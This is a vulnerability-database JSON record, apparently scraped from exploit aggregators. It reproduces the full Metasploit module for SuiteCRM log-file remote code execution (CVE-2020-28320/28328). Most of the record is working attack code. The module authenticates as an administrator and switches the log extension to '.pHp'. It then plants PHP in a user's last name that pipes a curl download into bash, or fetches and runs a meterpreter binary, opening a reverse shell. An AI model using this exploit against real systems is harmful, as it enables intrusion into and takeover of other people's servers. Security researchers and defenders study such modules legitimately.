fail_with(Failure::NoAccess, datastore['USER'].to_s) unless @authenticated\r\n fail_with(Failure::NoAccess, \"#{datastore['USER']} does not have administrative rights!\") unless @is_admin\r\n modify_system_settings_file\r\n poison_log_file\r\n execute_php\r\n ensure\r\n restore if datastore['RESTORECONF']\r\n end\r\nend", "sourceHref": "https://www.exploit-db.com/download/50531", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2021-12-23T13:21:13", "description": "This Metasploit module exploits an input validation error on the log file extension parameter. It does not properly validate upper/lower case characters. Once this occurs, the application log file will be treated as a php file. The log file can then be populated with php code by changing the username of a valid user, as this info is logged. The php code in the file can then be executed by sending an HTTP request to the log file. A similar issue was reported by the same researcher where a blank file extension could be supplied and the extension could be provided in the file name. This exploit will work on those versions as well, and those references are included.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-04T00:00:00", "type": "zdt", "title": "SuiteCRM Log File Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28320", "CVE-2020-28328"], "modified": "2021-06-04T00:00:00", "id": "1337DAY-ID-36361", "href": "https://0day.today/exploit/description/36361", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::CmdStager\n include Msf::Exploit::FileDropper\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'SuiteCRM Log File Remote Code Execution',\n 'Description' => %q{\n This module exploits an input validation error on the log file extension parameter. It does\n not properly validate upper/lower case characters. Once this occurs, the application log file\n will be treated as a php file. The log file can then be populated with php code by changing the\n username of a valid user, as this info is logged. The php code in the file can then be executed\n by sending an HTTP request to the log file. A similar issue was reported by the same researcher\n where a blank file extension could be supplied and the extension could be provided in the file\n name. This exploit will work on those versions as well, and those references are included.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'M. Cory Billington' # @_th3y\n ],\n 'References' =>\n [\n ['CVE', '2020-28328'], # First CVE\n ['EDB', '49001'], # Previous exploit, this module will cover those versions too. Almost identical issue.\n ['URL', 'https://theyhack.me/CVE-2020-28320-SuiteCRM-RCE/'], # First exploit\n ['URL', 'https://theyhack.me/SuiteCRM-RCE-2/'] # This exploit\n ],\n 'Platform' => %w[linux unix],\n 'Arch' => %w[ARCH_X64 ARCH_CMD ARCH_X86],\n 'Targets' =>\n [\n [\n 'Linux (x64)', {\n 'Arch' => ARCH_X64,\n 'Platform' => 'linux',\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'\n }\n }\n ],\n [\n 'Linux (cmd)', {\n 'Arch' => ARCH_CMD,\n 'Platform' => 'unix',\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_bash'\n }\n }\n ]\n ],\n 'Notes' =>\n {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\n 'Reliability' => [REPEATABLE_SESSION]\n },\n 'Privileged' => true,\n 'DisclosureDate' => '2021-04-28',\n 'DefaultTarget' => 0\n )\n )\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to SuiteCRM', '/']),\n OptString.new('USER', [true, 'Username of user with administrative rights', 'admin']),\n OptString.new('PASS', [true, 'Password for administrator', 'admin']),\n OptBool.new('RESTORECONF', [false, 'Restore the configuration file to default after exploit runs', true]),\n OptString.new('WRITABLEDIR', [false, 'Writable directory to stage meterpreter', '/tmp']),\n OptString.new('LASTNAME', [false, 'Admin user last name to clean up profile', 'admin'])\n ]\n )\n end\n\n def check\n authenticate unless @authenticated\n return Exploit::CheckCode::Unknown unless @authenticated\n\n version_check_request = send_request_cgi(\n {\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'keep_cookies' => true,\n 'vars_get' => {\n 'module' => 'Home',\n 'action' => 'About'\n }\n }\n )\n\n return Exploit::CheckCode::Unknown(\"#{peer} - Connection timed out\") unless version_check_request\n\n version_match = version_check_request.body[/\n Version\n \\s\n \\d{1} # Major revision\n \\.\n \\d{1,2} # Minor revision\n \\.\n \\d{1,2} # Bug fix release\n /x]\n\n version = version_match.partition(' ').last\n\n if version.nil? || version.empty?\n about_url = \"#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Home&action=About\"\n return Exploit::CheckCode::Unknown(\"Check #{about_url} to confirm version.\")\n end\n\n patched_version = Rex::Version.new('7.11.18')\n current_version = Rex::Version.new(version)\n\n return Exploit::CheckCode::Appears(\"SuiteCRM #{version}\") if current_version <= patched_version\n\n Exploit::CheckCode::Safe(\"SuiteCRM #{version}\")\n end\n\n def authenticate\n print_status(\"Authenticating as #{datastore['USER']}\")\n initial_req = send_request_cgi(\n {\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri, 'index.php'),\n 'keep_cookies' => true,\n 'vars_get' => {\n 'module' => 'Users',\n 'action' => 'Login'\n }\n }\n )\n\n return false unless initial_req && initial_req.code == 200\n\n login = send_request_cgi(\n {\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri, 'index.php'),\n 'keep_cookies' => true,\n 'vars_post' => {\n 'module' => 'Users',\n 'action' => 'Authenticate',\n 'return_module' => 'Users',\n 'return_action' => 'Login',\n 'user_name' => datastore['USER'],\n 'username_password' => datastore['PASS'],\n 'Login' => 'Log In'\n }\n }\n )\n\n return false unless login && login.code == 302\n\n res = send_request_cgi(\n {\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri, 'index.php'),\n 'keep_cookies' => true,\n 'vars_get' => {\n 'module' => 'Administration',\n 'action' => 'index'\n }\n }\n )\n\n auth_succeeded?(res)\n end\n\n def auth_succeeded?(res)\n return false unless res\n\n if res.code == 200\n print_good(\"Authenticated as: #{datastore['USER']}\")\n if res.body.include?('Unauthorized access to administration.')\n print_warning(\"#{datastore['USER']} does not have administrative rights! Exploit will fail.\")\n @is_admin = false\n else\n print_good(\"#{datastore['USER']} has administrative rights.\")\n @is_admin = true\n end\n @authenticated = true\n return true\n else\n print_error(\"Failed to authenticate as: #{datastore['USER']}\")\n return false\n end\n end\n\n def post_log_file(data)\n send_request_cgi(\n {\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri, 'index.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'keep_cookies' => true,\n 'headers' => {\n 'Referer' => \"#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Configurator&action=EditView\"\n },\n 'data' => data.to_s\n }\n )\n end\n\n def modify_system_settings_file\n filename = rand_text_alphanumeric(8).to_s\n extension = '.pHp'\n @php_fname = filename + extension\n action = 'Modify system settings file'\n print_status(\"Trying - #{action}\")\n\n data = Rex::MIME::Message.new\n data.add_part('SaveConfig', nil, nil, 'form-data; name=\"action\"')\n data.add_part('Configurator', nil, nil, 'form-data; name=\"module\"')\n data.add_part(filename.to_s, nil, nil, 'form-data; name=\"logger_file_name\"')\n data.add_part(extension.to_s, nil, nil, 'form-data; name=\"logger_file_ext\"')\n data.add_part('info', nil, nil, 'form-data; name=\"logger_level\"')\n data.add_part('Save', nil, nil, 'form-data; name=\"save\"')\n\n res = post_log_file(data)\n check_logfile_request(res, action)\n end\n\n def poison_log_file\n action = 'Poison log file'\n if target.arch.first == 'cmd'\n command_injection = \"<?php `curl #{@download_url} | bash`; ?>\"\n else\n @meterpreter_fname = \"#{datastore['WRITABLEDIR']}/#{rand_text_alphanumeric(8)}\"\n command_injection = %(\n <?php `curl #{@download_url} -o #{@meterpreter_fname};\n /bin/chmod 700 #{@meterpreter_fname};\n /bin/sh -c #{@meterpreter_fname};`; ?>\n )\n end\n\n print_status(\"Trying - #{action}\")\n\n data = Rex::MIME::Message.new\n data.add_part('Users', nil, nil, 'form-data; name=\"module\"')\n data.add_part('1', nil, nil, 'form-data; name=\"record\"')\n data.add_part('Save', nil, nil, 'form-data; name=\"action\"')\n data.add_part('EditView', nil, nil, 'form-data; name=\"page\"')\n data.add_part('DetailView', nil, nil, 'form-data; name=\"return_action\"')\n data.add_part(datastore['USER'], nil, nil, 'form-data; name=\"user_name\"')\n data.add_part(command_injection, nil, nil, 'form-data; name=\"last_name\"')\n\n res = post_log_file(data)\n check_logfile_request(res, action)\n end\n\n def restore\n action = 'Restore logging to default configuration'\n print_status(\"Trying - #{action}\")\n\n data = Rex::MIME::Message.new\n data.add_part('SaveConfig', nil, nil, 'form-data; name=\"action\"')\n data.add_part('Configurator', nil, nil, 'form-data; name=\"module\"')\n data.add_part('suitecrm', nil, nil, 'form-data; name=\"logger_file_name\"')\n data.add_part('.log', nil, nil, 'form-data; name=\"logger_file_ext\"')\n data.add_part('fatal', nil, nil, 'form-data; name=\"logger_level\"')\n data.add_part('Save', nil, nil, 'form-data; name=\"save\"')\n\n post_log_file(data)\n\n data = Rex::MIME::Message.new\n data.add_part('Users', nil, nil, 'form-data; name=\"module\"')\n data.add_part('1', nil, nil, 'form-data; name=\"record\"')\n data.add_part('Save', nil, nil, 'form-data; name=\"action\"')\n data.add_part('EditView', nil, nil, 'form-data; name=\"page\"')\n data.add_part('DetailView', nil, nil, 'form-data; name=\"return_action\"')\n data.add_part(datastore['USER'], nil, nil, 'form-data; name=\"user_name\"')\n data.add_part(datastore['LASTNAME'], nil, nil, 'form-data; name=\"last_name\"')\n\n res = post_log_file(data)\n\n print_error(\"Failed - #{action}\") unless res && res.code == 301\n\n print_good(\"Succeeded - #{action}\")\n end\n\n def check_logfile_request(res, action)\n fail_with(Failure::Unknown, \"#{action} - no reply\") unless res\n\n unless res.code == 301\n print_error(\"Failed - #{action}\")\n fail_with(Failure::UnexpectedReply, \"Failed - #{action}\")\n end\n\n print_good(\"Succeeded - #{action}\")\n end\n\n def execute_php\n print_status(\"Executing php code in log file: #{@php_fname}\")\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri, @php_fname),\n 'keep_cookies' => true\n }\n )\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{@php_fname}\") if res && res.code == 404\n register_files_for_cleanup(@php_fname)\n register_files_for_cleanup(@meterpreter_fname) unless @meterpreter_fname.nil? || @meterpreter_fname.empty?\n end\n\n def on_request_uri(cli, _request)\n send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })\n print_good(\"#{peer} - Payload sent!\")\n end\n\n def start_http_server\n start_service(\n {\n 'Uri' => {\n 'Proc' => proc do |cli, req|\n on_request_uri(cli, req)\n end,\n 'Path' => resource_uri\n }\n }\n )\n @download_url = get_uri\n end\n\n def exploit\n start_http_server\n authenticate unless @authenticated\n fail_with(Failure::NoAccess, datastore['USER'].to_s) unless @authenticated\n fail_with(Failure::NoAccess, \"#{datastore['USER']} does not have administrative rights!\") unless @is_admin\n modify_system_settings_file\n poison_log_file\n execute_php\n ensure\n restore if datastore['RESTORECONF']\n end\nend\n", "sourceHref": "https://0day.today/exploit/36361", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}]}

SuiteCRM 7.11.18 - Remote Code Execution Exploit

Description

Related